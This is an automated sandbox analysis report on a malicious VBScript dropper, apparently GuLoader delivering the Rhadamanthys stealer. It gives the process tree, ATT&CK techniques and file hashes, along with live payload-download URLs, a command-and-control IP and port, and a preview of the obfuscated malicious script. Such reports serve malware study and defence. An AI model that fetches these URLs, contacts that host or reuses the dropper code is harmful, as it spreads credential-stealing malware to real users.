Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

Source: Yara match, File source: 00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000003.2340047272.00000000227E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

Source: Yara match, File source: 00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000003.2340047272.00000000227E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 20_2_04D7AB70 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 211 Scripting | Valid Accounts | 111 Windows Management Instrumentation | 211 Scripting | 411 Process Injection | 11 Masquerading | 21 Input Capture | 231 Security Software Discovery | Remote Services | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 151 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | 1 Extra Window Memory Injection | 411 Process Injection | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 224 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Behavior Graph
ID: 1578231, Sample: YinLHGpoX4.vbs, Startdate: 19/12/2024, Architecture: WINDOWS, Score: 100
DNS/IP: www.tdejb.com; www.ftsengineers.com; 8 other IPs or domains
Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected RHADAMANTHYS Stealer; 9 other signatures

wscript.exe (started)
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
  powershell.exe (started)
    DNS/IP: ftsengineers.com 103.53.42.63, 443, 49739 PUBLIC-DOMAIN-REGISTRYUS India
    DNS/IP: astenterprises.com.pk 107.161.23.150, 443, 49730 RAMNODEUS United States
    Dropped: C:\Users\Public\pqg5u7vt.doc, Composite
    Dropped: C:\Users\Public\k9o5xs1hnem9ja8a.vbs, ASCII
    Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
    wscript.exe (started)
      Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
      WMIC.exe (started)
        Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        conhost.exe (started)
      powershell.exe (started)
        DNS/IP: tdejb.com 202.71.109.228, 443, 49732, 49754 TMVADS-APTM-VADSDCHostingMY Malaysia
        conhost.exe (started)
    WINWORD.EXE (started)
    conhost.exe (started)
powershell.exe (started)
  Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
  msiexec.exe (started)
    Signatures: Switches to a custom stack to bypass stack traces
    svchost.exe (started)
      DNS/IP: 45.149.241.141, 2023, 49830, 49856 UUNETUS Germany
      Signatures: System process connects to network (likely due to code injection or exploit); Switches to a custom stack to bypass stack traces
  conhost.exe (started)
svchost.exe (started)
  DNS/IP: 127.0.0.1 unknown unknown

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| YinLHGpoX4.vbs | 13% | ReversingLabs | Script-WScript.Trojan.GuLoader | |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://ftsengineers.com | 0% | Avira URL Cloud | safe | |
| https://www.tdejb.com/ab/ab.binLocksHydwww.tequila.ae/ab/ab.bin | 0% | Avira URL Cloud | safe | |
| http://www.ftsengineers.com | 0% | Avira URL Cloud | safe | |
| http://www.tdejb.com | 0% | Avira URL Cloud | safe | |
| https://www.astenterprises.com.pk/lm/lm.vbs | 0% | Avira URL Cloud | safe | |
| https://www.tdejb.com/ab/ab.bin | 0% | Avira URL Cloud | safe | |
| https://www.ftsengineers.com | 0% | Avira URL Cloud | safe | |
| https://www.ftsengineers.com/lm/List | 0% | Avira URL Cloud | safe | |
| https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc | 0% | Avira URL Cloud | safe | |
| http://tdejb.com | 0% | Avira URL Cloud | safe | |
| https://www.tdejb.com/ab/ab.binl= | 0% | Avira URL Cloud | safe | |
| https://www.tdejb.com/d&F | 0% | Avira URL Cloud | safe | |
| http://crl.microsq | 0% | Avira URL Cloud | safe | |
| https://www.tdejb.com/r&4 | 0% | Avira URL Cloud | safe | |
| https://www.ftsengineers.com/km/Reissuer.xsn | 0% | Avira URL Cloud | safe | |
| https://www.tdejb.com | 0% | Avira URL Cloud | safe | |
| https://www.tdejb.com/kp/Reissuer.xsn | 0% | Avira URL Cloud | safe | |
| https://www.ftsengineers.com/km/Reissuer.xsnH | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high |
| astenterprises.com.pk | 107.161.23.150 | true | false | | high |
| tdejb.com | 202.71.109.228 | true | false | | unknown |
| default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.99 | true | false | | high |
| ftsengineers.com | 103.53.42.63 | true | true | | unknown |
| www.ftsengineers.com | unknown | unknown | true | | unknown |
| www.astenterprises.com.pk | unknown | unknown | false | | high |
| www.tdejb.com | unknown | unknown | true | | unknown |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578231
Start date and time: 2024-12-19 12:49:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: YinLHGpoX4.vbs
renamed because original name is a hash value
Original Sample Name: 4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@22/247@3/5
EGA Information:
• Successful, ratio: 20%
HCA Information:
• Successful, ratio: 71%
• Number of executed functions: 83
• Number of non-executed functions: 30
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 199.232.214.172, 52.109.28.46, 52.113.194.132, 52.109.76.243, 92.122.16.236, 52.111.252.16, 52.111.252.17, 52.111.252.18, 52.111.252.15, 13.69.116.107, 2.17.100.210, 2.17.100.200, 23.32.239.26, 23.32.239.17, 2.19.198.19, 20.12.23.50, 20.190.177.149, 13.107.246.63
                                                                                      • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, neu-azsc-000.roaming.officeapps.live.com, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdweu09.westeurope.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.co
                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 7256 because there are no executed function
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5568 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7592 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7968 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: YinLHGpoX4.vbs
Time      Type             Description
06:50:46  API Interceptor  4828296x Sleep call for process: powershell.exe modified
06:50:50  API Interceptor  1x Sleep call for process: wscript.exe modified
06:50:51  API Interceptor  1x Sleep call for process: WMIC.exe modified
06:51:20  API Interceptor  2x Sleep call for process: svchost.exe modified
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                        No context
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                        Entropy (8bit):1.3073696514069466
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr5:KooCEYhgYEL0In
                                                                                                                                                        MD5:3EEF7E33F4E9633DE64291D86B408E44
                                                                                                                                                        SHA1:C5CE06F32BFF105199E0B8FCD0B54B7807F9110B
                                                                                                                                                        SHA-256:8FA1DD8D470B4D6EFFEF47DEEFD431F77A6B560F0467E0F41C82F89B7789B029
                                                                                                                                                        SHA-512:C0F717089D9EA52ABD07E062A42871C2FF99E667E9F826715112FCB7156A89D574DBCC62279C6CEBC6E7A8304CA7B57388917A0EBF97F6085907800A56D662D6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf8124d46, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                        Entropy (8bit):0.4221732383621877
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                                                                                                        MD5:E73A71633FF84E5EF00FAFE213B4504F
                                                                                                                                                        SHA1:2031D44C8C4D13ABD5927E3D11A094561AB2DDD6
                                                                                                                                                        SHA-256:EEA296484B4998D99641AE7778A9FB73C7E307A1AA74256F0F80D5A403C6F8B7
                                                                                                                                                        SHA-512:7812F41E61CDFA276E4252C9F558683DD7F784CE2E2FD013D6A8D5AB6F0F9465722B3A3811796262F934D3321C33156FCF63345BEB3E5C902F3B132ED4F1653C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16384
                                                                                                                                                        Entropy (8bit):0.07723066764839415
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/OmUYeHEkrCjn13a/7W53+vollcVO/lnlZMxZNQl:/JUzH453q07Oewk
                                                                                                                                                        MD5:E065F7F195443CDB1F142DEEA4BDE6A6
                                                                                                                                                        SHA1:B0B6000639B9FA45F416B3713429EB9CD95C3944
                                                                                                                                                        SHA-256:5C7D62FFB897A7039564B7F987B28DD83E7852F5C1A2211ADB1DE17053615665
                                                                                                                                                        SHA-512:311A9456F1EE02160B2BBE45865D867705EDDB4E8D41E7EA4BCE6104E9885CAB2F3788A4CC3C702FA5002AA576394422764E2549A85C058B101B9B0B3A910658
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):29579
                                                                                                                                                        Entropy (8bit):5.204170965038756
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:RoOYipQPhx2CivOoqu2diFwy8o7KUxWV09Sj6R8S/EF3Yl745zTMdK1dD5FSIUA7:R9pQTS8pVf63upVYMvfuXWPKS4aHg8nD
                                                                                                                                                        MD5:623C703E541FEF627956FC12F65A10F7
                                                                                                                                                        SHA1:168C99DFCBE191B37CD76B7D982FCA23BD673882
                                                                                                                                                        SHA-256:48932DC695B2D3A3C7384C2E07E7312F17DCB33882805EA14B1EF8C694A7D6AC
                                                                                                                                                        SHA-512:8121D245039257A27CBCF0FBA78600A54955E2C331F0EFC63A5EEB18DCEE1ACF1F0554774244E71DEC50743740272A44DD6656A47FD9747B030AE26B0227C214
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:....Private Const Kiloenes = &H2364..Private Const Programdiskens = &HFFFF3C0C..Private Const Reliances = -10676..Private Const Roodle = "Nonsyncopation; flibbertigibbet."..Private Const Snitsaar = "Farmerne sammensyningens"..Private Const Unsupervised = "inequitably dactylic,"..Private Const Resiling = 60139..Private Const Aarhusianerne = &HFFFF5AFB..Private Const hvidvinen = "Smidiggrelsers dispositionsnummereringernes"..Private Const solskinsdage = "certificeredes? unsmokable?"..Private Const Openness = -10018..Private Const Repay = "Paruras animeringerne65"..........Set Schizorhinal211 = CreateObject("HNetCfg.FwMgr")....Set Ugsomely = Schizorhinal211.LocalPolicy.CurrentProfile....Set Futurummerne = Ugsomely.ICMPSettings........'Unostentatiousness? unhard desorbable infinitiv; echidnehesperides........'Overwomanise130. jerngitterseng:..Function Sharesman ()....For I = 1566 To 84 step - 1..Unstrictured = Unstrictured & "Hjertekardiogrammer"..next....Calliperer213 = Calliperer213 & ";
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Pietro Perelli- Steeltrade Srl, Template: Normal.dotm, Last Saved By: Pietro Perelli- Steeltrade Srl, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Wed Dec 11 15:07:00 2024, Last Saved Time/Date: Wed Dec 11 15:09:00 2024, Number of Pages: 1, Number of Words: 39, Number of Characters: 224, Security: 0
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):29184
                                                                                                                                                        Entropy (8bit):2.9417810913356135
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:ETN4ZEvAqf0g7K6/6rJ984woO+QHj1GpLYQg:qoiSJPw+QD1Gp
                                                                                                                                                        MD5:16EF383D209324DA590213E9634FDDDF
                                                                                                                                                        SHA1:53A8316279661D9DF0D64D004DD7ABF667A4A547
                                                                                                                                                        SHA-256:AAF9885EBACFAB6CFF8111D142C6D54E307791C929C9891441C1A9A9A9392A47
                                                                                                                                                        SHA-512:908F68773DEC17558D5D553FD8A31D3B24584524AB18A89B3970F53C0BCE2E20EBF66D2BEB4F49079DA51B2C4AC8CF22196AF4DA5198F2156958466FCF866715
                                                                                                                                                        Malicious:true
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.550390878129965
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:5LEwblllW6C+/tI/vlllfllrYLaaR1:lV/X1h
                                                                                                                                                        MD5:D84684CD97DD42F89BBD797D5489EF55
                                                                                                                                                        SHA1:9F3F8CB9281B5049B8F28F14B881ED5231E7D091
                                                                                                                                                        SHA-256:9AEA2C5220768F58221BAF8567737D8CEF750BBBECB22DA1C7786876E4B5A65B
                                                                                                                                                        SHA-512:5C73625985D526E366C6974C0F775BB51C5734852F316794B52CB5A17602115467B83EC47A8ADD653AE72E2B0F965286EA25C98F280A71045045355D4ABED788
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):71954
                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):328
                                                                                                                                                        Entropy (8bit):3.247897867253901
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:kKM3D9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:UqDImsLNkPlE99SNxAhUe/3
                                                                                                                                                        MD5:68F67F9067C27A424565CC769E23E375
                                                                                                                                                        SHA1:BBF7D7DFC269EBFB6095C4EC52E6C07EBBC43456
                                                                                                                                                        SHA-256:3A9843617EBC7AE51360EA27687A90F14D770A726C9819E482C96FE297FA6572
                                                                                                                                                        SHA-512:F7742DE34DC815A5A26BF392645BBF490C28BA481CFD9659F2563C66A574266BE14EB11E8C253519DFF135C962E1CAFBA35D6580A20468BA68C232217647A0DC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:p...... ..........C@.R..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1869
                                                                                                                                                        Entropy (8bit):5.091287881393181
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:cG3JFnzyr3InzysWkSyrWgdnzyrXHnzyMySyKUdSyqIASyE/dyDhdyBkJdyVYdyO:hF27I2sVbKgd2rH2MybKUdbqIAbE/ED3
                                                                                                                                                        MD5:6890609393F00696E1788F5AB5600073
                                                                                                                                                        SHA1:03669FAC84F9265081A924D7B37E9F519941DAA4
                                                                                                                                                        SHA-256:9CB374EC508DA3E204FB0AAA7FA2986354E66D8529F83C4D436DB96E12B7702C
                                                                                                                                                        SHA-512:FD6DE631AD5C3EF4E228DB873887C54AA7F779FCC2B3149DEA21BD8A132A5360322A5D9B2A88595E0C0840E08E282E69EB1B5F278F85448D0F8E3BAFB71C29CC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos Display_45876482</Id><LAT>2023-10-04T10:58:38Z</LAT><key>29442803203.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-04T10:58:38Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-04T10:58:38Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2024-12-19T11:51:21Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-04T10:58:38Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-04T10:58:38Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:JSON data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):521377
                                                                                                                                                        Entropy (8bit):4.9084889265453135
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                                                        MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                                                        SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                                                        SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                                                        SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):773040
                                                                                                                                                        Entropy (8bit):6.55939673749297
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                                                        MD5:4296A064B917926682E7EED650D4A745
                                                                                                                                                        SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                                                        SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                                                        SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2278
                                                                                                                                                        Entropy (8bit):3.8619193216811754
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:uiTrlKxsxxYxl9Il8utslo4sXFkZirxRsHAkaGdvYNQzd1rc:vkYrUSXQmMYMYNQU
                                                                                                                                                        MD5:89F69315C60FDED58D2BFCA55B242AE3
                                                                                                                                                        SHA1:061E03414599CEE19A8FCE774DBD802F8176563F
